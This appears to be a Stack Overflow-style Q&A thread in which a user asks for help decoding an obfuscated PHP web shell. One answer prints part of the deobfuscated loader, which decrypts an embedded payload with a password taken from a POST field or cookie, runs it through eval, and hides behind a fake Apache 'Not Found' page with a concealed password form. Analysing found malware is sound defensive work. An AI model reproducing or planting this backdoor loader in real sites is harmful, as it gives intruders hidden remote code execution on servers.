# Who thinks they can decode this encryped PHP file?

Tags: php, security, password, encryption-key

http://pastebin.com/7jP67T2V

I have decoded the first part($e = base64_decode) but after that I get stuck.

I haven't seen a shell like this before and can't find any similar ones to see how they were encoded.

Comment: I'm voting to close this question as off-topic because  this is not about Magento

Answer (score 1):

I didn't get fully but some part

```
 $pwd = isset($_POST['cGFzc3d']) ? base64_encode(md5($_POST['cGFzc3d'])) : (isset($_COOKIE[md5($_SERVER['HTTP_HOST'] . 'pwd') ]) ? $_COOKIE[md5($_SERVER['HTTP_HOST'] . 'pwd') ] : NULL);
    if ($pwd) {
        $k = $pwd;
        for ($a = 0;$a < strlen($e);$a++) {
            $e[$a] = chr((ord($e[$a]) - ord($k[$a])) % 256 ^ ord($k[$a + 1]));
            $k.= $e[$a];
        }
        if ($e = @gzinflate($e)) {
            @setcookie(md5($_SERVER['HTTP_HOST'] . 'pwd'), $pwd);
            $k = "";
            eval($e);
        }
    }
    die("<h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at " . $_SERVER['HTTP_HOST'] . " Port 80</address><style>input { margin:0;background-color:#fff;border:1px solid #fff; }</style><center><form method=post><input type=password name=cGFzc3d></form></center>");
}
```

Have you tried Ioncube for decoding.

Comment: Yes i have got to that part, but I need to decode the base64 part that you see when you get to that part. I have not tried ioncube but i assume there is a way to load this php file in realtime and look at the script after it has been decrypted. I'm hoping to have more comments on this post.

Comment: $k = $pwd;        for ($a = 0;$a < strlen($e);$a++) {            $e[$a] = chr((ord($e[$a]) - ord($k[$a])) % 256 ^ ord($k[$a + 1]));            $k.= $e[$a]; If im not mistaken, this part looks like it could be encoding it because I can't get past this specific part